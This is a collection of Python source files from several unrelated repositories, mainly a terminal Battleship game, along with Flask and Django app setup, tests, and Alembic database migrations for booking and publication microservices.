messages_bulk_data[MESSAGE_BULK_DATA_LEN * i:MESSAGE_BULK_DATA_LEN * i + MESSAGE_BULK_DATA_LEN]
for i in range(0, messages_count)]
return splitted_messages_bulk_data
def dump_pdu(sim_dump_directory_path: str, messages_file_name="6F3C"):
message_pdu_factory = MessagePDUFactory()
for message_bulk_data in dump_bulk_data(sim_dump_directory_path, messages_file_name):
yield message_pdu_factory.create_message_pdu(message_bulk_data)
def dump(sim_dump_directory_path: str, messages_file_name="6F3C"):
message_converter = MessageConverter()
for message_bulk_data in dump_bulk_data(sim_dump_directory_path, messages_file_name):
yield message_converter.convert_bulk_data_to_message(message_bulk_data)
``` |
{
"source": "753951357159/Battleship",
"score": 4
} |
#### File: 753951357159/Battleship/Main.py
```python
from Settings import TITLE, NAME, VERSION, MDW, DEFAULT, GREEN, RED, PURPLE
from Modes.TPT import main as tpt_main
def header(mdw: int) -> None:
"""
The header of the program. Appears only once during start up. Displays the
title, name, and version of the program.
"""
print(f'{TITLE:^{mdw}}')
print(f'{NAME:^{mdw}}')
print(f'{VERSION!s:^{mdw}}', f'\n')
def menu() -> bool:
"""
The main menu of the program. The following are the valid options:
- Single Player [Arcade]
- Single Player [Realistic]
- Single Player [Competitive]
- Two Player [Traditional]
- Two Player [Arcade]
- Two Player [Realistic]
- Two Player [Competitive]
- LAN [Traditional]
- LAN [Competitive]
- Quit
Parameter(s):
- mdw: Represents the maximum display width of a screen.
"""
# Display options available
window = 31 # longest option character count
print(f'{GREEN}{"Please Select An Option Below:".center(MDW)}{DEFAULT}')
print(f'{"(1) Single Player [Arcade]":<{window}}'.center(MDW))
print(f'{"(2) Single Player [Realistic]":<{window}}'.center(MDW))
print(f'{"(3) Single Player [Competitive]":<{window}}'.center(MDW))
print(f'{"(4) Two Player [Traditional]":<{window}}'.center(MDW))
print(f'{"(5) Two Player [Arcade]":<{window}}'.center(MDW))
print(f'{"(6) Two Player [Realistic]":<{window}}'.center(MDW))
print(f'{"(7) Two Player [Competitive]":<{window}}'.center(MDW))
print(f'{"(8) LAN [Traditional]":<{window}}'.center(MDW))
print(f'{"(9) LAN [Competitive]":<{window}}'.center(MDW))
print(f'{"(0) QUIT":<{window}}'.center(MDW), f'\n')
options = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
# Ask user for valid option if applicable
response = input(f'{PURPLE} >>> {DEFAULT}')
while (response not in options) or (response == ''):
response = input(f'{PURPLE} >>> {RED}Invalid Option{DEFAULT} - '
f'Please try again: ')
if response == '1': # Starts the Single Player Arcade game mode
return False
elif response == '2': # Starts the Single Player Realistic game mode
return False
elif response == '3': # Starts the Single Player Competitive game mode
return False
elif response == '4': # Starts the Two Player Traditional game mode
tpt_main()
return False
elif response == '5': # Starts the Two Player Arcade game mode
return False
elif response == '6': # Starts the Two Player Realistic game mode
return False
elif response == '7': # Starts the Two Player Competitive game mode
return False
elif response == '8': # Starts the LAN Traditional game mode
return False
elif response == '9': # Starts the LAN Competitive game mode
return False
else: # Terminates the program
return True
if __name__ == '__main__':
exit_permission = False # Program will not exit unless True
header(MDW)
# Run program, exit when True
while not exit_permission:
exit_permission = menu()
```
#### File: Battleship/Modes/General.py
```python
from typing import Tuple, List, Optional
from Settings import DEFAULT, PURPLE, RED, GREEN, BLUE, \
AFFIRMATIVE, NEGATIVE, NATIONS, \
ROW_ICON, ROW_SEP, COL_ICON, COL_SEP, COL_SPACER, CORNER, \
EMPTY_FRAME, MDW
from Objects.Mechanics.Game import BattleshipGame
from Objects.Mechanics.Player import Player
from Objects.Mechanics.Grid import Grid
# Setup ------------------------------------------------------------------------
def _setup_player() -> Tuple[Player, Player]:
"""Creates Player 1 and Player 2 basic information."""
# Helper function(s):
def _basic_info(number: int) -> Tuple[str, str]:
"""
Sets up the basic information for a player.
Parameter(s):
- number: The player number
"""
basic_check = False
while not basic_check:
name = input(
f'{PURPLE} >>> Player {number}{DEFAULT} name: ').strip()
nation = input(f'{PURPLE} >>> Player {number}{DEFAULT} '
f'nationality: ').strip().upper()
# Check if nation is valid
while (nation in nations_joined) or \
(nation not in list(NATIONS.keys())):
# Get list of valid nations
valid = list(NATIONS.keys())
for nation in nations_joined:
valid.remove(nation)
nation = input(f'{PURPLE} >>> {RED}Invalid Nation{DEFAULT} - '
f'Select from {valid}: ').strip().upper()
# Confirm with user that this is what they want
print(f'\nPLAYER {number} INFORMATION: ')
print(f'\tName: {name}')
print(f'\tNationality: {nation}')
confirm = input(
f'{PURPLE} >>> Player {number}{DEFAULT}, confirm '
f'the above is correct (Y/N): ').strip()
# Check user response is valid
while confirm not in AFFIRMATIVE and \
confirm not in NEGATIVE:
confirm = input(f'{PURPLE} >>> {RED}'
f'Invalid Option{DEFAULT} (Y/N): ')
if confirm in AFFIRMATIVE:
return name, nation
print('')
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
nations_joined = []
# Create basic Player 1 profile
p1_name, p1_nation = _basic_info(1)
p1 = Player(p1_name, p1_nation, 1)
nations_joined.append(p1_nation)
print(f'{GREEN}Welcome,{DEFAULT} {p1.name}!\n')
# Create basic Player 2 profile
p2_name, p2_nation = _basic_info(2)
p2 = Player(p2_name, p2_nation, 2)
nations_joined.append(p2_nation)
print(f'{GREEN}Welcome,{DEFAULT} {p2.name}!\n')
return p1, p2
def _setup_grid(player: Player) -> bool:
"""
Sets up the grid for the specified player.
Parameter(s):
- player: The player that the grid is currently being setup for
"""
# Helper function(s):
def _add_vessel_list() -> List[str]:
"""Creates a list of all vessel that can be added to the grid.."""
ret = [f'{BLUE}Currently In Port{DEFAULT}']
for index in range(6):
for i in range(len(player.fleet[index])):
vessel = f'[{player.fleet[index][i].abbrev} ' \
f'{player.fleet[index][i].pennant:02d}] ' \
f'{player.fleet[index][i].name}'
ret.append(vessel)
return ret
def _remove_vessel_list() -> List[str]:
"""Creates a list of all vessels removable from grid."""
ret = [f'{BLUE}Currently On Grid{DEFAULT}']
possible = [vessel.__copy__() for vessel in player.bb_curr]
possible.extend([vessel.__copy__() for vessel in player.cc_curr])
possible.extend([vessel.__copy__() for vessel in player.dd_curr])
possible.extend([vessel.__copy__() for vessel in player.ff_curr])
possible.extend([vessel.__copy__() for vessel in player.sm_curr])
possible.extend([vessel.__copy__() for vessel in player.cv_curr])
for i in range(len(possible)):
vessel = f'({possible[i].bow[0][0]}, {possible[i].bow[0][1]})' \
f' [{possible[i].abbrev} ' \
f'{possible[i].pennant:02d}] ' \
f'{possible[i].name}'
ret.append(vessel)
return ret
def _check_response(phrase: str) -> Tuple[bool, int, Optional[list]]:
"""
Checks if the response given by the user is valid.
- Must have 6 inputs or is equal to a specific command
- All inputs must match specific criteria
Valid format:
<command>, <class>, <pennant #>, <col>, <row>, <direction>
Parameter(s):
- phrase: The response being checked
"""
rem_dict = {'BB': player.bb_curr, 'CC': player.cc_curr,
'DD': player.dd_curr, 'FF': player.ff_curr,
'SM': player.sm_curr, 'CV': player.cv_curr}
add_dict = {'BB': 0, 'CC': 1, 'DD': 2, 'FF': 3, 'SM': 4, 'CV': 5}
# Check if response is the command \complete
if phrase.lower().strip() == '\\complete':
return True, -1, None
elif ',' not in phrase:
return False, 1, None # Invalid format
lst = phrase.split(',')
lst[0] = str(lst[0]).strip().lower()
# If player attempting to add vessel to grid
if len(lst) == 6:
for i in range(5):
lst[i + 1] = str(lst[i + 1]).strip().upper()
if lst[0] != '\\add':
return False, 2, None # Invalid command
elif lst[1] not in ['BB', 'CC', 'DD', 'FF', 'SM', 'CV']:
return False, 3, None # Invalid class
elif int(float(lst[2])) not in player.all_id[add_dict[lst[1]]]:
return False, 4, None # Invalid vessel
elif (lst[3] not in COL_ICON) or (lst[4] not in ROW_ICON):
return False, 5, None # Invalid coordinate
elif lst[5] not in ['N', 'S', 'E', 'W']:
return False, 6, None # Invalid direction
# Phrase is valid; check if vessel can be placed on grid
for i, vessel in enumerate(player.fleet[add_dict[lst[1]]]):
if vessel.pennant == int(lst[2]):
if not _check_placement(vessel.hp, lst[5],
(lst[3], lst[4])):
return False, 7, None # Invalid node
return True, -2, lst # Player is adding vessel
return False, 4, None # Invalid vessel
# If player attempting to remove vessel from grid
elif len(lst) == 3:
for i in range(2):
lst[i + 1] = str(lst[i + 1]).strip().upper()
if lst[0] != '\\remove':
return False, 2, None # Invalid command
elif lst[1] not in ['BB', 'CC', 'DD', 'FF', 'SM', 'CV']:
return False, 3, None # Invalid class
elif int(lst[2]) not in player.all_id[add_dict[lst[1]]]:
return False, 4, None # Invalid vessel
# Phrase is valid; check for pennant number
for i, vessel in enumerate(rem_dict[lst[1]]):
if vessel.pennant == int(lst[2]):
return True, -3, lst # player is removing vessel
return False, 4, None # Invalid vessel
else:
return False, 1, None # Invalid format
def _check_placement(hp: int, direction: str,
coordinate: Tuple[str, str]) -> bool:
"""
Checks to see if the coordinate and direction given is valid.
Parameter(s):
- hp: The hp of the vessel, equal to number of nodes to check
- direction: The direction the vessel is facing
- coordinate: The row and column
"""
col = COL_ICON.index(coordinate[0])
row = ROW_ICON.index(coordinate[1])
curr = player.personal.grid[row][col]
# Check to see if the bow node is already full or not
if curr.occupied:
return False
nodes = hp - 1
# Check all other nodes
if direction == 'N':
while nodes > 0:
if curr.south is None:
return False
elif curr.south.occupied:
return False
curr = curr.south
nodes -= 1
elif direction == 'S':
while nodes > 0:
if curr.north is None:
return False
elif curr.north.occupied:
return False
curr = curr.north
nodes -= 1
elif direction == 'E':
while nodes > 0:
if curr.west is None:
return False
elif curr.west.occupied:
return False
curr = curr.west
nodes -= 1
else:
while nodes > 0:
if curr.east is None:
return False
elif curr.east.occupied:
return False
curr = curr.east
nodes -= 1
return True
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# Print options and base (empty) grid
vessel_lst = _add_vessel_list()
vessel_lst.append(' ')
vessel_lst.extend(_remove_vessel_list())
print(EMPTY_FRAME)
print(parallel_print([player.personal], vessel_lst))
# Ask use for input
response = input(f'{PURPLE} >>> Command{DEFAULT}: ')
check = _check_response(response)
while not check[0]:
if check[1] == 1:
response = input(f'{PURPLE} >>> {RED}Invalid Format{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 2:
response = input(f'{PURPLE} >>> {RED}Invalid Command{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 3:
response = input(f'{PURPLE} >>> {RED}Invalid Class{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 4:
response = input(f'{PURPLE} >>> {RED}Invalid Vessel{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 5:
response = input(f'{PURPLE} >>> {RED}Invalid Coordinate{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 6:
response = input(f'{PURPLE} >>> {RED}Invalid Direction{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 7:
response = input(f'{PURPLE} >>> {RED}Invalid Nodes{DEFAULT}; '
f'{PURPLE}Command{DEFAULT} ')
check = _check_response(response)
# Response is valid, add vessel to grid
if check[1] == -2:
player.place_vessel(check[2][1], int(check[2][2]),
(check[2][3], check[2][4]), check[2][5])
return False
# Response is valid, remove vessel from grid
elif check[1] == -3:
player.remove_vessel(check[2][1], int(check[2][2]))
return False
# Response is valid, player requesting to complete planning
else:
return True
# Confirmation -----------------------------------------------------------------
def _confirm_grid(player: Player) -> bool:
"""
Final confirmation from player for placing down vessels on grid.
Parameter(s):
- player: Player 1 / Player 2
"""
print(EMPTY_FRAME)
print(player.personal)
print(f'{BLUE}CURRENTLY DEPLOYED VESSELS{DEFAULT}')
battle_lst = [player.bb_curr, player.cc_curr, player.dd_curr,
player.ff_curr, player.sm_curr, player.cv_curr]
for lst in battle_lst:
for vessel in lst:
print(f'{BLUE}[{vessel.abbrev}] {DEFAULT}'
f'{vessel.pennant:02d} {vessel.name:35} | '
f'({vessel.bow[0][0]}, {vessel.bow[0][1]}) | '
f'{vessel.bow[1]}')
check = input(f'\n{PURPLE} >>> {player.name}{DEFAULT}, '
f'FINAL CONFIRMATION (Y/N): ')
while check not in AFFIRMATIVE and check not in NEGATIVE:
check = input(f'{PURPLE} >>> {RED}Invalid Option{DEFAULT} (Y/N): ')
if check in AFFIRMATIVE:
return True
print('')
return False
# Game modification ------------------------------------------------------------
def remove_order(game: BattleshipGame, order_num: str) -> None:
"""
Removes the specified order based on the given order number and renumbers
all the remaining orders.
Parameter(s):
- orders: The list of current orders
- order_num: The id of the order that is to be removed
"""
order = game.current_orders.pop(int(float(order_num)) - 1)
index = int(float(order_num)) - 1
for i in range(index, len(game.current_orders)):
game.current_orders[i].order_id -= 1
# Adjust grid node
coord = order.coordinate
row = ROW_ICON.index(coord[1])
col = COL_ICON.index(coord[0])
node = game.current_player.traditional.grid[row][col]
node.not_target_and_drop()
# Display ----------------------------------------------------------------------
def press_to_continue() -> None:
"""
A simple method that prompts the user to 'press enter to continue.'
Parameter(s):
- mdw: Represents the Max Display Width for a screen.
"""
input(f'\n{PURPLE}{"Press ENTER to Continue...":^{MDW}}{DEFAULT}')
def print_log(game: BattleshipGame) -> None:
"""
Prints the entire Activity Log for the current player in the game.
Parameter(s):
- game: The current game taking place
"""
log = game.log.full_log(game.current_player.number)
ret = ''
for i in range(len(log)):
ret += log[i] + '\n'
print(ret)
press_to_continue()
def parallel_print(grids: List[Grid], headers: List[str]) -> str:
"""
Rearranges multiple grids and other statements so it can be neatly
printed on the screen.
Parameter(s):
- grids: A list of grids that are to be printed
- headers: A list of text that also needs to be printed alongside grids
Representation Invariant(s):
- Every grid must have the same size
- The list of list of statements has maximum number of text equal to
length of the grid
"""
row = ROW_ICON[36 - grids[0].size::]
col = COL_ICON[:grids[0].size]
ret = ''
for i in range(len(row)):
for grid in grids:
temp = f'{row[i]} {ROW_SEP} '
for j in range(len(col)):
temp += f'{grid.grid[i][j].__repr__()} '
ret += f'{temp.rstrip()} '
ret = ret[:-4:]
try:
ret += f' {headers[i]}\n'
except IndexError:
ret += f'\n'
col_lines = ''
col_lines += f' {CORNER}' + f'{COL_SPACER}{COL_SEP}' * grids[0].size
ret += ((col_lines + f' ') * len(grids)).rstrip()
try:
ret += f' {headers[36]}\n'
except IndexError:
ret += f'\n'
header = ' '
for k in range(grids[0].size):
header += col[k] + ' '
ret += ((header.rstrip() + ' ') * len(grids)).rstrip()
ret.rstrip()
try:
ret += f' {headers[37]}\n'
except IndexError:
pass
return ret + '\n'
def congratulate_p1() -> None:
"""
Prints a congratulatory message for player 1 who won the game.
"""
battle_is_over = [f'██████╗ █████╗ ████████╗████████╗██╗ ███████╗ '
f'██╗███████╗ ██████╗ ██╗ ██╗███████╗██████╗ ',
f'██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║ ██╔════╝ '
f'██║██╔════╝ ██╔═══██╗██║ ██║██╔════╝██╔══██╗',
f'██████╔╝███████║ ██║ ██║ ██║ █████╗ '
f'██║███████╗ ██║ ██║██║ ██║█████╗ ██████╔╝',
f'██╔══██╗██╔══██║ ██║ ██║ ██║ ██╔══╝ '
f'██║╚════██║ ██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗',
f'██████╔╝██║ ██║ ██║ ██║ ███████╗███████╗ '
f'██║███████║ ╚██████╔╝ ╚████╔╝ ███████╗██║ ██║',
f'╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝ '
f'╚═╝╚══════╝ ╚═════╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝']
victorious = [f'██████╗ ██╗ █████╗ ██╗ ██╗███████╗██████╗ ██╗ '
f' ██╗███████╗ ██╗ ██╗██╗ ██████╗████████╗ ██████╗ ██'
f'████╗ ██╗ ██████╗ ██╗ ██╗███████╗',
f'██╔══██╗██║ ██╔══██╗╚██╗ ██╔╝██╔════╝██╔══██╗ ███║ '
f' ██║██╔════╝ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██'
f'╔══██╗██║██╔═══██╗██║ ██║██╔════╝',
f'██████╔╝██║ ███████║ ╚████╔╝ █████╗ ██████╔╝ ╚██║ '
f' ██║███████╗ ██║ ██║██║██║ ██║ ██║ ██║██'
f'████╔╝██║██║ ██║██║ ██║███████╗',
f'██╔═══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔══██╗ ██║ '
f' ██║╚════██║ ╚██╗ ██╔╝██║██║ ██║ ██║ ██║██'
f'╔══██╗██║██║ ██║██║ ██║╚════██║',
f'██║ ███████╗██║ ██║ ██║ ███████╗██║ ██║ ██║ '
f' ██║███████║ ╚████╔╝ ██║╚██████╗ ██║ ╚██████╔╝██'
f'║ ██║██║╚██████╔╝╚██████╔╝███████║',
f'╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ '
f' ╚═╝╚══════╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═'
f'╝ ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝']
congratulations = [f' ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ █'
f'███████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗'
f' ███╗ ██╗███████╗██╗',
f'██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚'
f'══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██'
f'╗████╗ ██║██╔════╝██║',
f'██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ '
f' ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██'
f'║██╔██╗ ██║███████╗██║',
f'██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ '
f' ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██'
f'║██║╚██╗██║╚════██║╚═╝',
f'╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ '
f' ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔'
f'╝██║ ╚████║███████║██╗',
f' ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ '
f' ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝'
f' ╚═╝ ╚═══╝╚══════╝╚═╝']
ret = '\n' * 23
for i in range(len(battle_is_over)):
ret += f'{battle_is_over[i]:^310}\n'
ret += '\n'
for i in range(len(victorious)):
ret += f'{victorious[i]:^310}\n'
ret += '\n'
for i in range(len(congratulations)):
ret += f'{congratulations[i]:^310}\n'
ret += '\n' * 24
print(ret)
press_to_continue()
def congratulate_p2() -> None:
"""
Prints a congratulatory message for player 2 who won the game.
"""
battle_is_over = [f'██████╗ █████╗ ████████╗████████╗██╗ ███████╗ '
f'██╗███████╗ ██████╗ ██╗ ██╗███████╗██████╗ ',
f'██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║ ██╔════╝ '
f'██║██╔════╝ ██╔═══██╗██║ ██║██╔════╝██╔══██╗',
f'██████╔╝███████║ ██║ ██║ ██║ █████╗ '
f'██║███████╗ ██║ ██║██║ ██║█████╗ ██████╔╝',
f'██╔══██╗██╔══██║ ██║ ██║ ██║ ██╔══╝ '
f'██║╚════██║ ██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗',
f'██████╔╝██║ ██║ ██║ ██║ ███████╗███████╗ '
f'██║███████║ ╚██████╔╝ ╚████╔╝ ███████╗██║ ██║',
f'╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝ '
f'╚═╝╚══════╝ ╚═════╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝']
victorious = [f'██████╗ ██╗ █████╗ ██╗ ██╗███████╗██████╗ █████'
f'█╗ ██╗███████╗ ██╗ ██╗██╗ ██████╗████████╗ ██████'
f'╗ ██████╗ ██╗ ██████╗ ██╗ ██╗███████╗',
f'██╔══██╗██║ ██╔══██╗╚██╗ ██╔╝██╔════╝██╔══██╗ ╚════'
f'██╗ ██║██╔════╝ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══█'
f'█╗██╔══██╗██║██╔═══██╗██║ ██║██╔════╝',
f'██████╔╝██║ ███████║ ╚████╔╝ █████╗ ██████╔╝ ████'
f'█╔╝ ██║███████╗ ██║ ██║██║██║ ██║ ██║ █'
f'█║██████╔╝██║██║ ██║██║ ██║███████╗',
f'██╔═══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔══██╗ ██╔══'
f'═╝ ██║╚════██║ ╚██╗ ██╔╝██║██║ ██║ ██║ █'
f'█║██╔══██╗██║██║ ██║██║ ██║╚════██║',
f'██║ ███████╗██║ ██║ ██║ ███████╗██║ ██║ █████'
f'██╗ ██║███████║ ╚████╔╝ ██║╚██████╗ ██║ ╚██████'
f'╔╝██║ ██║██║╚██████╔╝╚██████╔╝███████║',
f'╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚════'
f'══╝ ╚═╝╚══════╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════'
f'╝ ╚═╝ ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝']
congratulations = [f' ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ █'
f'███████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗'
f' ███╗ ██╗███████╗██╗',
f'██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚'
f'══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██'
f'╗████╗ ██║██╔════╝██║',
f'██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ '
f' ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██'
f'║██╔██╗ ██║███████╗██║',
f'██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ '
f' ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██'
f'║██║╚██╗██║╚════██║╚═╝',
f'╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ '
f' ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔'
f'╝██║ ╚████║███████║██╗',
f' ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ '
f' ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝'
f' ╚═╝ ╚═══╝╚══════╝╚═╝']
ret = '\n' * 23
for i in range(len(battle_is_over)):
ret += f'{battle_is_over[i]:^310}\n'
ret += '\n'
for i in range(len(victorious)):
ret += f'{victorious[i]:^310}\n'
ret += '\n'
for i in range(len(congratulations)):
ret += f'{congratulations[i]:^310}\n'
ret += '\n' * 24
print(ret)
press_to_continue()
```
#### File: Objects/Mechanics/Order.py
```python
from typing import Tuple
from Settings import PURPLE, DEFAULT
class TraditionalOrder:
"""
The general command class used in Traditional Battleship to plan player
moves.
Attribute(s):
- order_id: The order number
- coordinate: The node that is being targeted (col, row)
"""
order_id: int
coordinate: Tuple[str, str]
def __init__(self, num: int, coord: Tuple[str, str]) -> None:
"""
Initializes a new Order.
Parameter(s):
- num: The order num
- coord: The coordinate of the node being targeted (col, row)
"""
self.order_id = num
self.coordinate = coord
def __str__(self) -> str:
return f'{PURPLE}{self.order_id:02d}{DEFAULT} | ' \
f'Targeting ({self.coordinate[0]}, {self.coordinate[1]})'
```
#### File: Objects/Vessels/Submarine.py
```python
from __future__ import annotations
from Objects.Vessels.Vessel import TraditionalVessel
# Due to circular import, cannot import form Settings.py
GREEN = '\033[32m' # Green
YELLOW = '\033[33m' # Yellow
RED = '\033[31m' # Red
class TraditionalSubmarine(TraditionalVessel):
"""The Submarine vessel class used for Traditional Battleship."""
def __init__(self, nation: str, name: str, pennant: int) -> None:
"""
Initializes a new Submarine.
Parameter(s):
- nation: The affiliated nation
- name: The name of the vessel
- pennant: The id number of the vessel
"""
super().__init__(nation, name, pennant)
self.type = 'Submarine'
self.abbrev = 'SM'
self.symbol = 'S'
self.hp = 4
self.hits_received = 0
self.health_color = f'{GREEN}'
self.enemy_hp_color = f'{RED}'
def __copy__(self) -> TraditionalSubmarine:
ret = TraditionalSubmarine(self.nation, self.name, self.pennant)
ret.hp = self.hp
ret.hits_received = self.hits_received
ret.health_color = self.health_color
ret.enemy_hp_color = self.enemy_hp_color
ret.sunk = self.sunk
ret.bow = self.bow
ret.hit = self.hit
return ret
def update_health_color(self) -> None:
if self.hp == 4:
return
elif self.hp > 1:
self.health_color = f'{YELLOW}'
self.enemy_hp_color = f'{YELLOW}'
else:
self.health_color = f'{RED}'
self.enemy_hp_color = f'{GREEN}'
``` |
{
"source": "754844887/flasky",
"score": 2
} |
#### File: flasky/app/__init__.py
```python
from flask import Flask
import config
from flask_wtf import CSRFProtect
from flask_wtf.csrf import generate_csrf
from flask_cors import CORS
from .auth import api_bp
from .models import db
from .main import main_bp
def create_app():
app = Flask(__name__)
app.config.from_object(config)
db.init_app(app)
app.register_blueprint(api_bp)
app.register_blueprint(main_bp)
csrf = CSRFProtect()
csrf.init_app(app)
cors = CORS()
cors.init_app(app)
return app
app = create_app()
# 生产csrf_token 用于表单csrf验证
# @app.after_request
# def after_request(response):
# csrf_token = generate_csrf()
# response.set_cookie('csrf_token', csrf_token)
# return response
``` |
{
"source": "754Bree/Django-ip-3",
"score": 3
} |
#### File: Django-ip-3/awwards/tests.py
```python
from django.test import TestCase
from .models import Profile,Projects
from django.contrib.auth.models import User
# Create your tests here.
class ProfileTest(TestCase):
def setUp(self):
self.briana = User(username = 'briana',email = '<EMAIL>')
self.briana = Profile(user = self.briana,bio = 'tests',image = 'test.jpg')
def test_instance(self):
self.assertTrue(isinstance(self.Briana,Profile))
def test_save_profile(self):
Profile.save_profile(self)
all_profiles = Profile.objects.all()
self.assertTrue(len(all_profiles),0)
class ProjectsTestCase(TestCase):
def setUp(self):
self.new_post = Projects(title = 'testT',image = 'test.jpg',description = 'testD',link = 'https://test.com',created_date='Jan,25.2021')
def test_save_project(self):
self.new_post.save_project()
image = Image.objects.all()
self.assertEqual(len(image),1)
def test_delete_project(self):
self.new_post.delete_project()
image = Projects.objects.all()
self.assertEqual(len(image),1)
``` |
{
"source": "7552-2020C2-grupo5/bookings-microservice",
"score": 2
} |
#### File: bookings-microservice/booking_microservice/api.py
```python
from flask_restx import Api
from booking_microservice import __version__
from booking_microservice.namespaces.bookings import api as bookings_namespace
from booking_microservice.namespaces.metrics import api as metrics_namespace
from booking_microservice.namespaces.token import api as token_namespace
api = Api(
prefix="/v1",
version=__version__,
title="Bookings API",
description="Bookings microservice for BookBNB",
default="Bookings",
default_label="Bookings operations",
validate=True,
)
api.add_namespace(bookings_namespace, path='/bookings')
api.add_namespace(metrics_namespace, path='/metrics')
api.add_namespace(token_namespace, path='/token')
@api.errorhandler
def handle_exception(error: Exception):
"""When an unhandled exception is raised"""
message = "Error: " + getattr(error, 'message', str(error))
return {'message': message}, getattr(error, 'code', 500)
```
#### File: migrations/versions/7eb209b7ab1e_booking_status.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from booking_microservice.constants import BookingStatus
# revision identifiers, used by Alembic.
revision = '7eb209b7ab1e'
down_revision = '0a95c6679356'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
connection = op.get_bind()
if connection.dialect.name == "postgresql":
status_enum = postgresql.ENUM(
*[x.value for x in BookingStatus.__members__.values()],
name='booking_status'
)
else:
status_enum = sa.Enum(
*[x.value for x in BookingStatus.__members__.values()],
name='booking_status'
)
status_enum.create(op.get_bind())
op.add_column(
'booking',
sa.Column(
'booking_status',
status_enum,
nullable=False,
default=BookingStatus.PENDING.value,
server_default=BookingStatus.PENDING.value,
),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('booking', 'booking_status')
# ### end Alembic commands ###
``` |
{
"source": "7552-2020C2-grupo5/publications-microservice",
"score": 2
} |
#### File: migrations/versions/9ae88ecbc099_add_star_model.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '9ae88ecbc099'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
'publication_star',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('publication_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['publication_id'], ['publication.id'],),
sa.PrimaryKeyConstraint('id'),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('publication_star')
# ### end Alembic commands ###
```
#### File: migrations/versions/fd36afc3738d_blockchain_fields.py
```python
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
from publications_microservice.constants import BlockChainStatus
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
status_enum = postgresql.ENUM(
'CONFIRMED', 'DENIED', 'PENDING', 'UNSET', 'ERROR', name='blockchain_status'
)
status_enum.create(op.get_bind())
op.add_column(
'publication', sa.Column('blockchain_id', sa.Integer(), nullable=True)
)
op.add_column(
'publication',
sa.Column(
'blockchain_status',
status_enum,
nullable=False,
